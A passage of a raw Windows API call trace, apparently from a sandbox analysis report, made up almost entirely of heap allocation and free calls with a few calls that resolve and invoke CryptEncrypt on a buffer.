hHeap=0x970000) returned 1 [0223.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51100 [0223.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0223.874] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0223.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0223.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0223.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0223.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0223.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0223.874] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0223.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0223.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0223.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0223.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0223.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0223.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0223.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0223.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0223.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0223.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0223.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0223.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0223.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0223.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0223.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0223.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0223.877] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3f24) returned 0x2f205a8 [0223.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f205a8 | out: hHeap=0x970000) returned 1 [0223.877] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0223.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0223.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0223.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0223.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0223.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0223.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x978490 [0223.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0223.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0223.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0223.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0223.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0223.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0223.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0223.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0223.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0223.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0223.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0223.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0223.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.878] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0223.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0223.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0223.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0223.879] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0223.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0223.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0223.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0223.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0223.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0223.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0223.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0223.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0223.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0223.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0223.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0223.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0223.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0223.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0223.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0223.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0223.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0223.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0223.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0223.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0223.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0223.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0223.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0223.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0223.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0223.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0223.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0223.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0223.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0223.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0223.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0223.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0223.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0223.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0223.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0223.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0223.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0223.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e513e8 [0223.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e513e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0223.883] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0223.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.883] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f710 [0223.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0223.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0223.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0223.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0223.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0223.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0223.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0223.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0223.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0223.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0223.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0223.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0223.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0223.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0223.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0223.884] CryptEncrypt (in: hKey=0xa87490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1c678*, pdwDataLen=0x8cef60*=0x3f24, dwBufLen=0x3f28 | out: pbData=0x2f1c678*, pdwDataLen=0x8cef60*=0x3f28) returned 1 [0223.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0223.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0223.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0223.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0223.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0223.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0223.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0223.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0223.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0223.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0223.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0223.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0223.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0223.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0223.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0223.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0223.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0223.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0223.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0223.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0223.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0223.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0223.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0223.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0223.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0223.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0223.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0223.886] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0223.886] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0223.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0223.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0223.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0223.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0223.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0223.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0223.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 